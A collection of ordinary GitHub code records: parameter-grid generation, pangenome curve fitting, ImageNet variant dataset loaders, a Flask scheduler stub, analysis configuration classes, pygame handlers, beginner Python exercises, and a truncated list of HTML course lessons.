+{"seq_id":"14313138593","text":"import itertools\nimport basedata\n\n\ndef all_variable_parameter_combinations(grid):\n tuples = list(itertools.product(*grid.values()))\n return [{list(grid.keys())[i]: tuple[i] for i in range(len(tuple))} for tuple in tuples]\n\n\ndef generate_basefiles(grid, template_fn):\n combos = all_variable_parameter_combinations(grid)\n template_name = template_fn.replace('.bas', '')\n for ix, combo in enumerate(combos):\n basedata.overwrite_parameters_in_basefile(template_fn, f'{template_name}{(ix + 1)}_.bas', combo)\n\n\nif __name__ == '__main__':\n pgrid = {\n 'Complexity': [1.25, 1.5, 1.8, 2.0],\n 'RRF': [0.1, 0.25, 0.5, 0.75, 0.9, 1.0],\n 'RRS': [0.125, 0.2, 0.3, 0.5, 0.7, 0.8, 1.0]\n }\n\n generate_basefiles(pgrid, 'l.bas')\n\n\n","repo_name":"0x17/SchedulingExperiments","sub_path":"basefile_generator.py","file_name":"basefile_generator.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"15247206123","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 4 14:02:56 2021\r\n\r\n@author: Usuario\r\n\"\"\"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 4 13:11:38 2021\r\n@author: Carlos Caicedo-Montoya\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy.optimize import curve_fit\r\n\r\n#Read data Pangenome\r\nmy_total_genes = pd.read_table(\"pangenome_micropan.csv\",\r\n sep=\",\", \r\n low_memory=False, header=None)\r\nmy_total_genes = my_total_genes.T\r\n\r\ntotal_genes_melted = 
my_total_genes.melt()\r\n\r\n\r\ngenomes = total_genes_melted.iloc[:,0]\r\ngenomes = np.asarray(genomes)\r\ngenomes = genomes + 1\r\npangenome = total_genes_melted.iloc[:,1]\r\n\r\n\r\n#Fit power law curve\r\n#PANGENOME\r\n\r\ndef pangenome_fit(x, gamma, G0):\r\n return G0*(x**gamma)\r\nparameters_pan, parameters_cov_pan = curve_fit(pangenome_fit,\r\n genomes,\r\n pangenome, p0=[1, 1])\r\n\r\n#Generate curves with the fit parameters3\r\n##Core genome\r\ngamma = parameters_pan[0]\r\npan0 = parameters_pan[1]\r\n\r\ngenomes_curve = np.linspace(1, max(genomes))\r\npangenome_curve = pan0*(genomes_curve**gamma)\r\nerr_pan = np.sqrt(np.diag(parameters_cov_pan))\r\n\r\n\r\n#Read data New genes\r\nmy_new_genes = pd.read_table(\"new_genes_micropan.csv\",\r\n sep=\",\", \r\n low_memory=False, header=None)\r\nmy_new_genes = my_new_genes.T\r\nnew_genes_melted = my_new_genes.melt()\r\n\r\ngenomes_new = new_genes_melted.iloc[:,0]\r\ngenomes_new = np.asarray(genomes_new)\r\ngenomes_new = genomes_new + 1\r\nnew_genes = new_genes_melted.iloc[:,1]\r\n\r\ndef new_genes_fit(x, alpha, G0):\r\n return G0*(x**alpha)\r\nparameters_new, parameters_cov_new = curve_fit(new_genes_fit,\r\n genomes_new,\r\n new_genes, p0=[1, 1])\r\n\r\n#Generate curves with the fit parameters3\r\n##Core genome\r\nalpha = parameters_new[0]\r\nnew0 = parameters_new[1]\r\n\r\ngenomes_curve_new = np.linspace(1, max(genomes_new))\r\nnew_genes_curve = new0*(genomes_curve_new**alpha)\r\nerr_core = np.sqrt(np.diag(parameters_cov_new))\r\n\r\n\r\n\r\n#Plots\r\nfig, ax = plt.subplots()\r\nax.plot(genomes, pangenome, '+', color = \"bisque\")\r\nax.plot(genomes_curve, pangenome_curve, 'darkorange', label = \"Total\")\r\nax.plot(genomes_new, new_genes, '+', color = \"khaki\")\r\nax.plot(genomes_curve, new_genes_curve, color = 'orange', label = \"New\")\r\nax.set_xlabel('Number of genomes', fontsize = 12)\r\nax.set_ylabel('Number of clusters', fontsize =12)\r\n\r\nax.text(1, 8000, r'$y = 2463.35 x ^ {0.27}$', fontsize = 12)\r\nax.text (1, 7000,\r\n r'$\\gamma = {0:0.2f} \\pm {1:0.4f}$'.format(gamma, err_pan[0]))\r\n\r\nax.text(60, 2000, r'$y = 569.97 x ^ {-0.69}$', fontsize = 12)\r\nax.text (60, 1000,\r\n r'$\\alpha = {0:0.2f} \\pm {1:0.3f}$'.format(-alpha, err_core[0]))\r\nax.grid()\r\nax.legend(loc=\"center right\")\r\n\r\n#plots 2\r\nfig1, ((ax1, ax2)) = plt.subplots(ncols = 2, figsize = (7,3.5))\r\nax1.plot(genomes, pangenome, '+', color = \"bisque\")\r\nax1.plot(genomes_curve, pangenome_curve, 'darkorange', label = \"Total\")\r\nax2.plot(genomes_new, new_genes, '+', color = \"khaki\")\r\nax2.plot(genomes_curve, new_genes_curve, color = 'orange', label = \"New\")\r\nax1.set_xlabel('Number of genomes', fontsize= 12)\r\nax1.set_ylabel('Number of clusters', fontsize= 12)\r\nax1.set_xlim(1, 120)\r\n\r\nax2.set_xlabel('Number of genomes', fontsize= 12)\r\n#ax2.set_ylabel('Number of clusters')\r\nax2.set_xlim(1, 120)\r\n\r\nax1.text(50, 5000, r'$y = 2463.35 x ^ {0.27}$', fontsize = 12)\r\nax1.text (50, 4200,\r\n r'$\\gamma = {0:0.2f} \\pm {1:0.4f}$'.format(gamma, err_pan[0]))\r\n\r\nax2.text(40, 500, r'$y = 569.97 x ^ {-0.69}$', fontsize = 12)\r\nax2.text (40, 400,\r\n r'$\\alpha = {0:0.2f} \\pm {1:0.3f}$'.format(-alpha, err_core[0]))\r\nax1.grid()\r\nax1.legend()\r\nax2.grid()\r\nax2.legend()\r\n\r\nfig1.savefig(\"Micropan_new_total.svg\", dpi=1200, format = 
'svg')\r\n\r\n\r\n\r\n","repo_name":"CarlosCaicedoM/python_bioinformatics","sub_path":"micropan_total_new_power_law_fit.py","file_name":"micropan_total_new_power_law_fit.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30748400975","text":"import logging\nimport os\nfrom typing import Callable, Optional\n\nimport numpy as np\nfrom PIL import Image\nfrom torch.utils.data.dataset import Dataset\nfrom torchvision.datasets import ImageFolder\nfrom torchvision.datasets.utils import check_integrity, download_and_extract_archive, verify_str_arg\nfrom tqdm import tqdm\n\n_logger = logging.getLogger(__name__)\n\n\nclass ImageNetA(ImageFolder):\n \"\"\"ImageNetA dataset.\n\n - Paper: [https://arxiv.org/abs/1907.07174](https://arxiv.org/abs/1907.07174).\n \"\"\"\n\n base_folder = \"imagenet-a\"\n url = \"https://people.eecs.berkeley.edu/~hendrycks/imagenet-a.tar\"\n filename = \"imagenet-a.tar\"\n tgz_md5 = \"c3e55429088dc681f30d81f4726b6595\"\n\n def __init__(self, root: str, split=None, transform: Optional[Callable] = None, download: bool = False, **kwargs):\n\n self.root = root\n\n if download:\n self.download()\n\n if not self._check_integrity():\n raise RuntimeError(\"Dataset not found or corrupted.\" + \" You can use download=True to download it\")\n\n super().__init__(root=os.path.join(root, self.base_folder), transform=transform, **kwargs)\n\n def _check_exists(self) -> bool:\n return os.path.exists(os.path.join(self.root, self.base_folder))\n\n def _check_integrity(self) -> bool:\n return check_integrity(os.path.join(self.root, self.filename), self.tgz_md5)\n\n def download(self) -> None:\n if self._check_integrity() and self._check_exists():\n _logger.debug(\"Files already downloaded and verified\")\n return\n download_and_extract_archive(self.url, self.root, filename=self.filename, md5=self.tgz_md5)\n\n\nclass ImageNetO(ImageNetA):\n \"\"\"ImageNetO datasets.\n\n Contains unknown classes to ImageNet-1k.\n\n\n - Paper: [https://arxiv.org/abs/1907.07174](https://arxiv.org/abs/1907.07174)\n \"\"\"\n\n base_folder = \"imagenet-o\"\n url = \"https://people.eecs.berkeley.edu/~hendrycks/imagenet-o.tar\"\n filename = \"imagenet-o.tar\"\n tgz_md5 = \"86bd7a50c1c4074fb18fc5f219d6d50b\"\n\n\nclass ImageNetR(ImageNetA):\n \"\"\"ImageNet-R(endition) dataset.\n\n Contains art, cartoons, deviantart, graffiti, embroidery, graphics, origami, paintings,\n patterns, plastic objects,plush objects, sculptures, sketches, tattoos, toys,\n and video game renditions of ImageNet-1k classes.\n\n - Paper: [https://arxiv.org/abs/2006.16241](https://arxiv.org/abs/2006.16241)\n \"\"\"\n\n base_folder = \"imagenet-r\"\n url = \"https://people.eecs.berkeley.edu/~hendrycks/imagenet-r.tar\"\n filename = \"imagenet-r.tar\"\n tgz_md5 = \"a61312130a589d0ca1a8fca1f2bd3337\"\n\n\nCORRUPTIONS = [\n \"brightness\",\n \"contrast\",\n \"defocus_blur\",\n \"elastic_transform\",\n \"fog\",\n \"frost\",\n \"gaussian_blur\",\n \"gaussian_noise\",\n \"glass_blur\",\n \"impulse_noise\",\n \"jpeg_compression\",\n \"motion_blur\",\n \"pixelate\",\n \"saturate\",\n \"shot_noise\",\n \"snow\",\n \"spatter\",\n \"speckle_noise\",\n \"zoom_blur\",\n]\n\n\nclass ImageNetC(ImageNetA):\n \"\"\"Corrupted version of the ImageNet-1k dataset.\n\n It contains the following subsets:\n\n - `noise` (21GB): gaussian_noise, shot_noise, and impulse_noise.\n - `blur` (7GB): defocus_blur, glass_blur, motion_blur, and zoom_blur.\n - `weather` (12GB): 
frost, snow, fog, and brightness.\n - `digital` (7GB): contrast, elastic_transform, pixelate, and jpeg_compression.\n - `extra` (15GB): speckle_noise, spatter, gaussian_blur, and saturate.\n\n - Paper: [https://arxiv.org/abs/1903.12261v1](https://arxiv.org/abs/1903.12261v1)\n \"\"\"\n\n split_list = [\"blur\", \"digital\", \"extra\", \"noise\", \"weather\"]\n base_folder_name = \"ImageNetC\"\n url_base = \"https://zenodo.org/record/2235448/files/\"\n tgz_md5_list = [\n \"2d8e81fdd8e07fef67b9334fa635e45c\",\n \"89157860d7b10d5797849337ca2e5c03\",\n \"d492dfba5fc162d8ec2c3cd8ee672984\",\n \"e80562d7f6c3f8834afb1ecf27252745\",\n \"33ffea4db4d93fe4a428c40a6ce0c25d\",\n ]\n corruptions = CORRUPTIONS\n\n def __init__(\n self,\n root: str,\n split: str,\n intensity: int,\n transform: Optional[Callable] = None,\n download: bool = False,\n **kwargs,\n ) -> None:\n self.root = os.path.expanduser(root)\n self.corruption = verify_str_arg(split, \"split\", self.corruptions)\n split_group = self._get_corruption_group(self.corruption)\n\n self._base_folder = os.path.join(root, self.base_folder_name, split_group)\n self.filename = split_group + \".tar\"\n self.url = self.url_base + self.filename\n self.tgz_md5 = self.tgz_md5_list[self.split_list.index(split_group)]\n\n self.base_folder = os.path.join(self._base_folder, split, str(intensity))\n\n super().__init__(root, transform=transform, download=download, **kwargs)\n\n def download(self) -> None:\n if self._check_integrity() and self._check_exists():\n _logger.debug(\"Files already downloaded and verified\")\n return\n download_and_extract_archive(\n self.url, self.root, extract_root=self._base_folder, filename=self.filename, md5=self.tgz_md5\n )\n\n @staticmethod\n def _get_corruption_group(corruption: str):\n split_group = \"\"\n if corruption in [\"defocus_blur\", \"glass_blur\", \"motion_blur\", \"zoom_blur\"]:\n split_group = \"blur\"\n elif corruption in [\"contrast\", \"elastic_transform\", \"pixelate\", \"jpeg_compression\"]:\n split_group = \"digital\"\n elif corruption in [\"speckle_noise\", \"spatter\", \"gaussian_blur\", \"saturate\"]:\n split_group = \"extra\"\n elif corruption in [\"gaussian_noise\", \"shot_noise\", \"impulse_noise\"]:\n split_group = \"noise\"\n elif corruption in [\"frost\", \"snow\", \"fog\", \"brightness\"]:\n split_group = \"weather\"\n return split_group\n\n\ndef _imagenet_c_to_npz(root: str, split: str, intensity: int, dest_folder: str = \"ImageNetCnpz\") -> None:\n\n dataset = ImageNetC(root, split, intensity, download=True)\n assert len(dataset) == 50_000, \"ImageNetC should have 50,000 images. 
Please check the dataset.\"\n    image_example = dataset[0][0]\n    width, height = image_example.size\n    _logger.info(\"Image size: %d x %d\", width, height)\n    x = np.ndarray(shape=(len(dataset), height, width, 3), dtype=np.uint8)\n    y = np.ndarray(shape=(len(dataset)), dtype=np.int32)\n    for i in tqdm(range(len(dataset))):\n        image, label = dataset[i]\n        x[i] = image\n        y[i] = label\n\n    os.makedirs(os.path.join(root, dest_folder), exist_ok=True)\n    np.savez(os.path.join(root, dest_folder, f\"{split}-{intensity}.npz\"), x=x, y=y)\n\n\nclass ImageNetCnpz(Dataset):\n    \"\"\"Corrupted version of the ImageNet-1k dataset saved in npz format.\"\"\"\n\n    corruptions = CORRUPTIONS\n    base_folder_name = \"ImageNetCnpz\"\n\n    def __init__(\n        self,\n        root: str,\n        split: str,\n        intensity: int,\n        transform: Optional[Callable] = None,\n        download: bool = False,\n        **kwargs,\n    ) -> None:\n        super().__init__()\n        self.root = os.path.expanduser(root)\n        self.corruption = verify_str_arg(split, \"split\", self.corruptions)\n        self.intensity = int(intensity)\n        self.path = os.path.join(self.root, self.base_folder_name, f\"{split}-{intensity}.npz\")\n        self.transform = transform\n        if download:\n            self.download()\n\n        data = np.load(self.path, mmap_mode=\"r\")\n        self.images = data[\"x\"]\n        self.labels = data[\"y\"]\n\n    def __getitem__(self, index):\n        x = self.images[index]\n        x = Image.fromarray(x)\n\n        if self.transform:\n            x = self.transform(x)\n\n        y = self.labels[index]\n        return x, y\n\n    def __len__(self):\n        return len(self.images)\n\n    def _check_exists(self) -> bool:\n        return os.path.exists(self.path)\n\n    def download(self) -> None:\n        if self._check_exists():\n            return\n        _imagenet_c_to_npz(self.root, self.corruption, self.intensity, self.base_folder_name)\n","repo_name":"edadaltocg/detectors","sub_path":"src/detectors/data/imagenet.py","file_name":"imagenet.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"43679368257","text":"from flask import Flask\nfrom flask_apscheduler import APScheduler\n\napp = Flask(__name__)\n\n\nclass Config(object):\n    SCHEDULER_API_ENABLED = True\n\n\n# apply the config before the scheduler is initialized so SCHEDULER_API_ENABLED takes effect\napp.config.from_object(Config())\n\n# initialize scheduler\nscheduler = APScheduler()\n# if you don't wanna use a config, you can set options here:\n# scheduler.api_enabled = True\nscheduler.init_app(app)\nscheduler.start()\n\n\n@app.route('/')\ndef hello_world():\n    return 'Hello World!'\n\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"raiots/PicoSec","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71938645229","text":"import json\nimport os\n\nfrom . 
import command\nfrom ..bundle import slug_for_race\n\n\nclass CandidateConfigToJson(object):\n \"\"\"Describe the candidate configurations as JSON\"\"\"\n\n def __init__(self, status):\n \"\"\"Constructor for the analyzer.\n :param status: The CollectorStatus object that tracks status state\n \"\"\"\n self.status = status\n\n def default_path(self):\n return os.path.join(self.status.analyzed_data_folder_path(), \"analysis_config.json\")\n\n def save(self, path=None):\n \"\"\"Write out JSON describing the candidate config to path\"\"\"\n\n if not path:\n path = self.default_path()\n races = []\n for race in self.status.races():\n race_dict = {\"slug\": race.slug, \"candidates\": []}\n races.append(race_dict)\n for candidate in race.candidates.all():\n terms = [term.term for term in candidate.search_terms.all()]\n candidate_dict = {\"name\": candidate.name, \"terms\": terms}\n race_dict[\"candidates\"].append(candidate_dict)\n with open(path, \"w\") as f:\n json.dump(races, f)\n\n\nclass AnalyzerConfig(command.ProcessCommandConfig):\n \"\"\"Gathers configuration information for the Analyzer\"\"\"\n def __init__(self, status, driver, script, description, max_depth=5, just_config=False):\n \"\"\"The config determines which driver is run and where the results end up\"\"\"\n super(AnalyzerConfig, self).__init__(driver, script, description, max_depth, just_config)\n self.output_path_components = lambda race, run=None: status.analysis_result_path_components(race, None, run)\n\n\nclass MetadataAnalyzerConfig(command.ProcessCommandConfig):\n \"\"\"Configuration for running metadata analysis\"\"\"\n def __init__(self, status, max_depth=5, just_config=False):\n super(MetadataAnalyzerConfig, self).__init__(\"MetadataSummary\", \"mdsummary.rb\", \"Analyzing\", max_depth, just_config)\n self.output_path_components = lambda race, run=None: status.analysis_result_path_components(race, \"metadata\", run)\n\n\nclass MetadataPlusAnalyzerConfig(command.ProcessCommandConfig):\n \"\"\"Configuration for running metadata analysis\"\"\"\n def __init__(self, status, max_depth=5, just_config=False):\n super(MetadataPlusAnalyzerConfig, self).__init__(None, \"mdsummary_plus.rb\", \"Analyzing\", max_depth, just_config)\n self.output_path_components = lambda race, run=None: status.analysis_result_path_components(race, \"mdplus\", run)\n\n\nclass HashtagAnalyzerConfig(command.ProcessCommandConfig):\n \"\"\"Configuration for running metadata analysis\"\"\"\n def __init__(self, status, max_depth=5, just_config=False):\n super(HashtagAnalyzerConfig, self).__init__(\"HashtagSummary\", \"hashtags.rb\", \"Analyzing Hashtags\", max_depth, just_config)\n self.output_path_components = lambda race, run=None: status.analysis_result_path_components(race, \"hashtag\", run)\n\n\nclass GenericAnalyzer(command.ProcessCommand):\n \"\"\"Analyze pruned runs based on the configuration\"\"\"\n\n def __init__(self, status, config=None, race=None):\n \"\"\"Constructor for the analyzer.\n :param status: The CollectorStatus object that tracks status state\n :param config: The configuration for the pruner\n :param race: The slug for a race if should restrict to one race\n \"\"\"\n self.status = status\n if not config:\n # Default to metadata analyzer\n config = MetadataAnalyzerConfig(status)\n self.config = config\n super(GenericAnalyzer, self).__init__(self.status, config, race)\n\n def prepare_processing(self, races):\n \"\"\"Do any preparation necessary to process the races. 
Default does nothing.\"\"\"\n for race in races:\n parent = self.config.output_path_components(race)\n self.status.ensure_folder_exists(self.status.path_from_components(parent))\n if len(races) > 0:\n CandidateConfigToJson(self.status).save()\n\n def queue_processing(self, race, run):\n pruned_data_path = self.status.pruned_data_file_path_for_run(race, run)\n analyzed_data_path_components = self.config.output_path_components(race, run)\n msg = \"{} run: {}\".format(self.process_description(), pruned_data_path.encode('utf-8'))\n self.status.progress_func({'type': 'analyze', 'message': msg})\n self.add_spark_task(pruned_data_path, analyzed_data_path_components, slug_for_race(race))\n","repo_name":"ciyer/smet-collect","sub_path":"src/python/smet-collect/smetcollect/process/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"1579563444","text":"import sys\nimport pygame\ndef check_keydown_events(event,ship):\n #Response button\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n \n elif event.key == pygame.K_LEFT:\n ship.moving_left =True\n\ndef check_keyup_events(event,ship):\n #Response release\n if event.key == pygame.K_RIGHT:\n ship.moving_right =False \n elif event.key == pygame.K_LEFT:\n ship.moving_left = False\ndef check_events(ship):\n \n #Response to button and mouse events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type==pygame.KEYDOWN:\n check_keydown_events(event,ship)\n \n \n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n \ndef update_screen(ai_settings,screen,ship):\n #Update the image on the screen and switch to the new screen\n \n #Redraw the screen every time you cycle\n screen.fill(ai_settings.bg_color)\n ship.blitme()\n \n #Make the recently drawn screen visible\n pygame.display.flip()\n \n \n","repo_name":"mcl19909949541/programming","sub_path":"program/#python_work/alien_invasion - 副本/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"33015543730","text":"# Exercise 1\n# Create a list with 5 items (French names of people) and output the 2nd item:\nnames = [\"Jean\", \"Pierre\", \"Claire\", \"Marie\", \"Luc\"]\nprint(names[1]) # Output: Pierre\n\n# Change the value of the first item to a new value:\nnames[0] = \"Louis\"\nprint(names) # Output: ['Louis', 'Pierre', 'Claire', 'Marie', 'Luc']\n\n# Add a sixth item to the list:\nnames.append(\"Sophie\")\nprint(names) # Output: ['Louis', 'Pierre', 'Claire', 'Marie', 'Luc', 'Sophie']\n\n# Add \"Bathel\" as the 3rd item in your list\nnames.insert(2, \"Bathel\")\nprint(names) # Output: ['Louis', 'Pierre', 'Bathel', 'Claire', 'Marie', 'Luc', 'Sophie']\n\n# Remove the 4th item from the list:\ndel names[3]\nprint(names) # Output: ['Louis', 'Pierre', 'Bathel', 'Marie', 'Luc', 'Sophie']\n\n# Use negative indexing to print the last item in your list:\nprint(names[-1]) # Output: Sophie\n\n# Create a new list with 7 items and print the 3rd, 4th, and 5th items:\nnew_list = ['Apple', 'Banana', 'Cherry', 'Date', 'Elderberry', 'Fig', 'Grape']\nprint(new_list[2:5]) # Output: ['Cherry', 'Date', 'Elderberry']\n\n# Create a list of countries and make a copy of it:\ncountries = ['USA', 'Canada', 'France', 'Germany', 'Australia']\ncountries_copy = 
countries.copy()\nprint(countries_copy)\n\n# Loop through the list of countries:\nfor country in countries:\n print(country)\n\n# Sort a list of animal names in both descending and ascending order\nanimal_names = ['Zebra', 'Elephant', 'Lion', 'Tiger', 'Giraffe']\nanimal_names.sort() # Ascending order\nprint(animal_names) # Output: ['Elephant', 'Giraffe', 'Lion', 'Tiger', 'Zebra']\n\n\nanimal_names.sort(reverse=True) # Descending order\nprint(animal_names) # Output: ['Zebra', 'Tiger', 'Lion', 'Giraffe', 'Elephant']\n\n# Output only animal names with the letter 'a' in them:\n\nfor name in animal_names:\n if 'a' in name.lower():\n print(name)\n\n# Join two lists containing first and second names\nfirst_names = ['Julius', 'Trevor', 'Michael', 'Emma']\nlast_names = ['Kazibwe', 'Ssemwogerere', 'Johnson', 'Williams']\n\nfull_names = []\nfor first, last in zip(first_names, last_names):\n full_names.append(f\"{first} {last}\")\n\nprint(full_names)\n\n#Exercise 2\n# Output your favorite phone brand\nx = (\"samsung\", \"iphone\", \"tecno\", \"redmi\")\nprint(x[1]) # Output: iphone\n\n# Use negative indexing to print the 2nd last item in the tuple\nprint(x[-2]) # Output: tecno\n\n# Update \"iphone\" to \"itel\" in the phones list\nphone_list = list(x)\nphone_list[1] = \"itel\"\nx = tuple(phone_list)\nprint(x) # Output: ('samsung', 'itel', 'tecno', 'redmi')\n\n# Add \"Huawei\" to the tuple:\n\nx = x + (\"Huawei\",)\nprint(x) # Output: ('samsung', 'itel', 'tecno', 'redmi', 'Huawei')\n\n# Loop through the tuple\nfor phone in x:\n print(phone)\n\n# Remove the first item in the tuple\nx = x[1:]\nprint(x) # Output: ('itel', 'tecno', 'redmi', 'Huawei')\n\n# Create a tuple of cities in Uganda using the tuple() constructor\ncities = tuple([\"Kampala\", \"Entebbe\", \"Jinja\", \"Gulu\"])\nprint(cities)\n\n# Unpack your tuple\nbrand1, brand2, brand3, brand4 = x\nprint(brand1, brand2, brand3, brand4)\n\n# Print the 2nd, 3rd, and 4th cities in the tuple\nprint(cities[1:4]) # Output: ('Entebbe', 'Jinja', 'Gulu')\n\n#Join two tuples containing first and second names:\nfirst_names = (\"John\", \"Jane\", \"Michael\")\nlast_names = (\"Doe\", \"Smith\", \"Johnson\")\n\nfull_names = first_names + last_names\nprint(full_names)\n\n# Create a tuple of colors and multiply it by 3:\ncolors = (\"red\", \"blue\", \"green\")\nmultiplied_colors = colors * 3\nprint(multiplied_colors)\n\n# Count the number of times 8 appears in the tuple (1, 3, 7, 8, 7, 5, 4, 6, 8, 5):\nthistuple = (1, 3, 7, 8, 7, 5, 4, 6, 8, 5)\ncount_8 = thistuple.count(8)\nprint(count_8) # Output: 2\n\n# Exercise 3\n# initialize a set called beverages\nbeverages = set([\"coffee\", \"tea\", \"juice\"])\nprint(beverages)\n\n# Add 2 more items to the beverages set\nbeverages.update([\"water\", \"soda\"])\nprint(beverages) # Output: {'coffee', 'juice', 'water', 'soda', 'tea'}\n\n# Check if \"microwave\" is present in the set\n\nmySet = {\"oven\", \"kettle\", \"microwave\", \"refrigerator\"}\nif \"microwave\" in mySet:\n print(\"Microwave is present in the set.\")\nelse:\n print(\"Microwave is not present in the set.\")\n\n# Remove \"kettle\" from the set\nmySet.remove(\"kettle\")\nprint(mySet) # Output: {'oven', 'microwave', 'refrigerator'}\n\n#Loop through the set\nfor item in mySet:\n print(item)\n\n# Add elements in a list to elements in a set\nmySet = {1, 2, 3, 4}\nmyList = [5, 6]\nmySet.update(myList)\nprint(mySet) # Output: {1, 2, 3, 4, 5, 6}\n\n# Join two sets containing ages and first names\nages = {16, 19}\nfirst_names = {\"Ken\", \"David\"}\njoined_set = 
ages.union(first_names)\nprint(joined_set)\n\n# Exercise 4\n# Concatenate an integer and a string\n\nnum = 2\nstring = \"apples\"\nresult = str(num) + string\nprint(result) # Output: 2apples\n\n# Remove spaces at the beginning, in the middle, and at the end of a string\ntxt = \" Hello, Uganda! \"\nresult = txt.strip()\nprint(result) # Output: \"Hello, Uganda!\"\n\n# Convert the value of 'txt' to uppercase\ntxt = \"Hello, Uganda!\"\nresult = txt.upper()\nprint(result) # Output: \"HELLO, UGANDA!\"\n\n# Replace character 'U' with 'V' in a string:\ntxt = \"Hello, Uganda!\"\nresult = txt.replace('U', 'V')\nprint(result) # Output: \"Hello, Vganda!\"\n\n# Return a range of characters in the 2nd, 3rd, and 4th position\ny = \"I am proudly Ugandan\"\nresult = y[1:4]\nprint(result) # Output: \" am\"\n\n# Correct the code to remove the error\nx = 'All \"Data Scientists\" are cool!' # In this case, I removed the outermost quotation marks to fix the error.\nprint(x) # Output: All \"Data Scientists\" are cool!\n\n\n# Exercise 5\n# Print the value of the shoe size\nShoes = {\n \"brand\": \"Nick\",\n \"color\": \"black\",\n \"size\": 40\n}\n\nprint(Shoes[\"size\"]) # Output: 40\n\n# Change the value \"Nick\" to \"Adidas\"\nShoes[\"brand\"] = \"Adidas\"\nprint(Shoes) # Output: {'brand': 'Adidas', 'color': 'black', 'size': 40}\n\n# Add a key/value pair \"type\": \"sneakers\" to the dictionary\n\nShoes[\"type\"] = \"sneakers\"\nprint(Shoes) # Output: {'brand': 'Adidas', 'color': 'black', 'size': 40, 'type': 'sneakers'}\n\n# Return a list of all the keys in the dictionary\n\nkeys = list(Shoes.keys())\nprint(keys) # Output: ['brand', 'color', 'size', 'type']\n\n# alternative \nkeys = list(Shoes) # Using the dictionary itself as an iterable\nprint(keys) # Output: ['brand', 'color', 'size']\n\n\n# Return a list of all the values in the dictionary\nvalues = list(Shoes.values())\nprint(values) # Output: ['Adidas', 'black', 40, 'sneakers']\n\n# Check if the key \"size\" exists in the dictionary\nif \"size\" in Shoes:\n print(\"Key 'size' exists in the dictionary.\")\nelse:\n print(\"Key 'size' does not exist in the dictionary.\")\n\n# Loop through the dictionary\nfor key, value in Shoes.items():\n print(key, \":\", value)\n\n# alterrnative \nfor key in Shoes:\n print(key, \":\", Shoes[key])\n\n\n# Remove \"color\" from the dictionary\ndel Shoes[\"color\"]\nprint(Shoes) # Output: {'brand': 'Adidas', 'size': 40, 'type': 'sneakers'}\n\n# Empty the dictionary\nShoes.clear()\nprint(Shoes) # Output: {}\n\n# Create a dictionary and make a copy of it\noriginal_dict = {\"name\": \"John\", \"age\": 25}\ncopied_dict = dict(original_dict)\nprint(copied_dict) # Output: {'name': 'John', 'age': 25}\n\n# Show nested dictionaries\ndata = {\n \"person1\": {\n \"name\": \"John\",\n \"age\": 25\n },\n \"person2\": {\n \"name\": \"Jane\",\n \"age\": 30\n }\n}\n\nfor person, details in data.items():\n print(\"Person:\", person)\n for key, value in details.items():\n print(key, \":\", value)\n print()\n","repo_name":"julius-kazibwe/recess_assignments","sub_path":"julius_Kazibwe_evening.py","file_name":"julius_Kazibwe_evening.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37038366036","text":"html = [\n {\n \"name\": \"Introdução ao Curso\",\n \"badge\": None,\n \"type\": 2,\n \"urls\": [{\n \"name\": \"Começa aqui o curso\",\n \"url\": \"https://www.youtube.com/watch?v=Ejkb_YpuHWs&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=1\"\n 
}, {\n \"name\": \"O que vamos aprender no módulo 1?\",\n \"url\": \"https://www.youtube.com/watch?v=jgQjeqGRdgA&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=2\"\n }, {\n \"name\": \"Precisamos fazer um acordo\",\n \"url\": \"https://www.youtube.com/watch?v=VfIXgGJWLvA&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=3\"\n }, {\n \"name\": \"Será que esse curso é para mim?\",\n \"url\": \"https://www.youtube.com/watch?v=57wyfS560Uk&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=4\"\n }, {\n \"name\": \"Melhores livros pra aprender HTML5 e CSS3\",\n \"url\": \"https://www.youtube.com/watch?v=0zLjVhHdOm8&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=5\"\n }],\n \"sugg_prevs\": [],\n \"sugg_nexts\": [40]\n }, # 62\n {\n \"name\": \"Instalar ferramentas para programar - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Instalar ferramentas para programar - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=UForX7ehChM&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=11\"\n }],\n \"sugg_prevs\": [44],\n \"sugg_nexts\": []\n }, # 63\n {\n \"name\": \"Primeiro código - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Primeiro código - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=E6CdIawPTh0&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=12\"\n }],\n \"sugg_prevs\": [63],\n \"sugg_nexts\": []\n }, # 64\n {\n 